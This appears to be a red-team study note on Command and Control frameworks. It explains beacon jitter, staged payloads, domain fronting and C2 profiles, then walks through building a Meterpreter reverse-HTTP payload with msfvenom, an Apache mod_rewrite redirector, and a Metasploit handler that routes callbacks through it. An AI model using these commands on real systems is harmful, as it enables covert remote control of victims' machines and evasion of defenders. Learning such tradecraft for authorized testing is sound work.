**Command and Control** (C2), at the most basic level it is a server that is capable of handling many reverse shells calling back at one (C2 Agents). Almost all C2 frameworks require a special payload generator, usually built into the framework itself, [[Metasploit]] is one example of a C2 Framework that has its own payload generator, [[Metasploit#Msfvenom|MSFVenom]]. 
Now, C2 frameworks also differ from a simple listener (think [[Netcat]] and the likes) for their Post Exploitation features.
# Structure
## C2 Server
The most essential component. It server as a hub for agents to call back to. Agents will periodically reach out to the C2 server and wait for the operator's commands.
## Agents / Payloads
An agent is a program generated by the C2 framework that calls back to a listener on a C2 server. Most of the time, this agent enables special functionality compared to a standard reverse shell. Also most frameworks implement pseudo commands to make some tasks easier, like for downloading or uploading files onto a system. Finally agents can be highly configurable, we can adjust on the timing of how often the C2 agents beacon out to a listener on a C2 server and much more.
## Listener
An application running on the C2 server that waits for a callback over a specific port or protocol. DNS, HTTP, or HTTPS are some of the most common ones.
## Beacons
The process of a C2 agent calling back to the listener running on a C2 server.

# Obfuscating Agent Callbacks
## Jittering Sleep Timers
One key thing that some security analysts, anti-virus and some firewalls look for when attempting to identify C2 traffic is beaconing and the rate at which a device beacons out to a C2 server. Let's say that an agent beacons each 5 minutes. Then when observing the traffic it will be easier to notice these call backs as they follow a pattern.
This is where Jitter comes into place. It essentially just takes the sleep timer and adds some variation to it, be it by addition or subtraction. Now our C2 beaconing will exhibit a stranger pattern that will resemble more that of an average user.
In more advanced C2 frameworks it may be possible to alter a variety of parameters, like "File" jitter, where it adds junk data to the payload or files being transmitted to make it seem larger and more random.

# Payload Types
## Staged
Staged payloads require a callback to the C2 server to download additional parts of the C2 agent. This is commonly referred to as a **"Dropper"** as it "drops" onto the victim machine to download the second stage of out staged payload. This is the preferred method over stageless payloads because aa small amount of code needs to be written to retrieve the additional parts of the C2 agent from the C2 server. It also makes it easier to obfuscate code to bypass Anti-Virus programs or firewalls.

## Stageless
The simpler of the two, they contain the full C2 agent and will call back to the C2 server and begin beaconing immediately.

# Payload Formats
As we already know Windows PE files are not the only way to execute code on a system. Some C2 frameworks support [[Payload Delivery|payloads]] in various other formats for example:
- PowerShell Scripts
	- Which may contain C# code and may be compiled and executed with the Add-Type commandlet
- HTA Files
- JScript Files
- VB Application/Scripts
- Microsoft Office Documents
- etc.

# Modules
## Post Exploitation Modules
Post exploitation modules are simply modules that deal with anything after the initial point of compromise, this could be as simple as running [[Bloodhound|SharpHound.ps1]] to find paths of lateral movement, or it could be as complex as dumping LSASS and parsing credentials in memory

## Pivoting Modules
One of the last major components of a C2 framework is its pivoting modules, making it easier to access restricted network segments withing the C2 framework. If we have Administrative access on a system, we may be able to open up an "SMB Beacon", which can enable a machine to act as a proxy via the SMB protocol. This may allow machines in a a restricted network segment to communicate with our C2 server.

# Facing The World
One important obstacle that all Red Teamers must overcome is placing infrastructure in plain view.
## Domain Fronting
Domain Fronting utilizes a known, good host (ej Cloudflare). Cloudflare runs a business that provides enhanced metrics on HTTP connection details as well as caching HTTP connection requests to save bandwidth. Red Teamers can abuse this to make it appear that a workstation or a server is communicating with a known, trusted IP address. Geolocation results will show wherever the nearest Cloudflare server is and the IP address will show as being owned by Cloudflare.

## C2 Profiles
This technique goes by several names by several different products "NGING Reverse Proxy", "Apache Mod_Proxy/Mod_Rewrite", "Malleable HTTP C2 Profiles", and many others. However, they are all more or less the same. All of the proxy features more or less allow a user to control specific elements of the incoming HTTP request. Let's say an incoming connection request has an "X-C2-Server" header, we could explicitly extract this header using the specific technology that is at our disposal and ensure that our C2 server responds with C2 based responses. Whereas if a normal user queried the HTTP server they might see a generic webpage. This is all dependent on our configuration.

# Frameworks
## Metasploit
[[Metasploit]], one of the most popular Exploitation and Post Exploitation CLI frameworks.
## Armitage
[[Armitage]] is an extension of the Metasploit Framework - it adds a GUI and is written in Java, it is very similar to [[Cobalt Strike]], as both share the same creator. It offers an easy way to enumerate and visualize all of our targets. Aside from looking a lot like Cobalt Strike, It also offers some unique features. One of the most popular is known as the **Hail Mary attack**, which attempts to run all exploits for the services running on a specific workstation.
## Powershell Empire/Starkiller
[[Empire]] is another popular C2 server. It features agents written in various languages compatible with multiple platforms, making it an incredibly versatile C2. It's GUI part is **Starkiller**.
## Covenant
[[Covenant]] is one of the most unique C2 Frameworks being written in C#. Unlike Metasploit or Armitage, it is primarily used for Post-Exploitation and lateral movement with HTTP, HTTPS and SMB listeners with highly customizable agents.
## Sliver
[[Sliver]] is an advanced, highly customizable multi-user CLI-Based C2 framework. Sliver is written in Go, which makes reverse engineering the C2 "implants" incredibly difficult. It supports various protocols for C2 communications like WireGuard, mTLS, HTTP(S), DNS, and much more. Additionally, it supports BOF files for additional functionality, DNS Canary Domains for masking C2 communications, automatic Let's Encrypt certificate generation for HTTPS beacons and much more

# SSH Port-forwarding
Now, we never want to expose the management interface publicly. We should always listen on a local interface and not on a pyblic-facing one, this of course complicates access for other operators, but the solution is an easy one. By creating a new user account and enabling [[SSH]] access on the server, they will be able to SSH port forward TCP/55553.
To do this we first need to [enable the SSH port](https://www.geeksforgeeks.org/how-to-enable-and-start-ssh-on-kali-linux/) on our machine. Once this is done we can set up our port-forwarding.
For this we could set up our Teamserver to listen on localhost on TCP/55553. So in order to access remotely, we can use
```shell
ssh -L 55553:127.0.0.1:55553 <user>@<C2 Server>
```
This will make it so when an operator wants to access the Jump server (or in this case the C2 server) in port `55553` it will instead access it through port `22` and it will forward that to itself (`127.0.0.1`) in port `55553`

# C2 Redirectors
A redirector is a server that "redirects" HTTP/HTTPS requests based on information within the HTTP request body. In productions systems we may see a Redirector in the form of a Load Balancer. This server often runs ion `Apache2` or `NGINX`.
## Setting one up
There are many ways we can do this, a simple one is with the use of both `Apache2` and [[Metasploit]]. In Apache we will be leveraging a module called "mod_rewrite". This Module allows us to write rules to forward requests to internal or external hosts on a server based on specific HTTP headers or content. For this we will the the following modules to be enabled:
- `rewrite`
- `proxy`
- `proxy_http`
- `headers`
we can do that in a root session with the following command
```shell
a2enmod rewrite && a2enmod proxy && a2enmod proxy_http && a2enmod headers && systemctl start apache2 && systemctl status apache2
```
Now using Meterpreter we can configure various aspects of the HTTP request. It is very common to make slight adjustments to the `User-Agent` in the C2 HTTP/HTTPS payloads as they are in every HTTP request and look more or less the same. For this we can generate a reverse HTTP payload using `msfvenom`.
```shell
msfvenom -p windows/meterpreter/reverse_http LHOST=eth0 LPORT=80 HttpUserAgent=Hacker -f exe -o shell.exe
```
Once the target opens the payload we will get an HTTP request (can verify with [[Wireshark]]) with a `User-Agent: Hacker`.
Now that we have a field we can control in the HTTP request, we can create an `Apache2 mod_rewrite` rule that filters on the user agent `Hacker` and forward it to our Metasploit C2 server.
For this we will be taking the default Apache config and modifying it to our advantage. On Debian based systems, the default config can be found at `/etc/apache2/sites-available/000-default.conf`
The default will look something like this
```shell
kali@kali > cat /etc/apache2/sites-available/000-default.conf | grep -v '#'

<VirtualHost *:80> 
	ServerAdmin webmaster@localhost 
	DocumentRoot /var/www/html 
	
	<Directory> 
		AllowOverride All 
	</Directory> 
	
	ErrorLog ${APACHE_LOG_DIR}/error.log 
	CustomLog ${APACHE_LOG_DIR}/access.log combined 
</VirtualHost>
```
Now we need to enable the Rewrite Engine, add a rewrite condition, and lastly, pass through the Apache 2 Proxy.

To enable the Rewrite Engine, we must add `RewriteEngine On` onto a new line in the `VirtualHost` section.

Now we will be using a Rewrite Condition targeting the HTTP User-Agent. For a complete list of HTTP Request Targets [lookatthis](https://httpd.apache.org/docs/2.4/mod/mod_rewrite.html). Because we only want to match the `User-Agent` "Hacker" we need to use some basic Regular Expressions to capture this, adding a `^` signals the beginning of a string and a `$` at the end of the series, leaving us with `^Hacker$`. This Regex will **only** capture the Hacker User-Agent. We can add this line 
```
ReWriteCond %{HTTP_USER_AGENT} "^Hacker$"
```
to our config to only allow HTTP Requests with the `Hacker` user agent to access Metasploit.

Finally we must forward the request through `Apache2`, through our proxy, to Metasploit. For this we must use the `ProxyPass` feature of Apache's `mod_proxy module`. To do this, we just need to specify the base URI that the request will be forwarded to (in this case "/"), and the target we want to forward the request to. The latter one may vary from setup to setup but it will be the IP of our C2 server. In this case it will use "localhost" and the port that Metasploit will be listening into.

This will give us our full config file that will look like so:
```shell
kali@kali$ cat /etc/apache2/sites-available/000-default.conf | grep -v '#' 

<VirtualHost *:80> 
	ServerAdmin webmaster@localhost 
	DocumentRoot /var/www/html 
	
	RewriteEngine On 
	RewriteCond %{HTTP_USER_AGENT} "^Hacker$" 
	ProxyPass "/" "http://localhost:8080/" 
	
	<Directory> 
		AllowOverride All 
	</Directory>
	
	ErrorLog ${APACHE_LOG_DIR}/error.log 
	CustomLog ${APACHE_LOG_DIR}/access.log combined 
</VirtualHost>
```

Finally, we can just set up Meterpreter. We set our `LHOST` to the incoming interface that we are expecting a connection from, in this case `127.0.0.1`, in a practical use, this will be our public IP address. And the `LPORT` whatever we set up in the forward request in Apache. This two options will also need to be duplicated for `ReverseListenerBindAddress` and `ReverseListenerBindPort`.
Next, we need to set up `OverrideLHOST`, this value will be our redirector's IP or Domain name. After that, we need to set the `OverrideLPORT`, this will be the port that the HTTP/HTTPS is running on, on our Redirector. Lastly, we must set the `OverrideRequestHost` to true. This will make it so Meterpreter responds with the `OverrideHost` information, so all queries go through the Redirector and not our C2 server
```shell
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp 
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http 
payload => windows/meterpreter/reverse_http 
msf6 exploit(multi/handler) > set LHOST 127.0.0.1 
LHOST => 127.0.0.1 
msf6 exploit(multi/handler) > set LPORT 8080 
LPORT => 8080 
msf6 exploit(multi/handler) > set ReverseListenerBindAddress 127.0.0.1 
ReverseListenerBindAddress => 127.0.0.1 
msf6 exploit(multi/handler) > set ReverseListenerBindPort 8080 
ReverseListenerBindPort => 8080 
msf6 exploit(multi/handler) > set OverrideLHOST 192.168.12.34
OverrideLHOST => 192.168.12.34 
msf6 exploit(multi/handler) > set OverrideLPORT 80 
OverrideLPORT => 80
msf6 exploit(multi/handler) > set HttpUserAgent Hacker
HttpUserAgent => Hacker
msf6 exploit(multi/handler) > set OverrideRequestHost true
OverrideRequestHost => true 
msf6 exploit(multi/handler) > run
```
Once this is all done, running the Meterpreter Reverse Shell should now proxy all communications through our Redirector.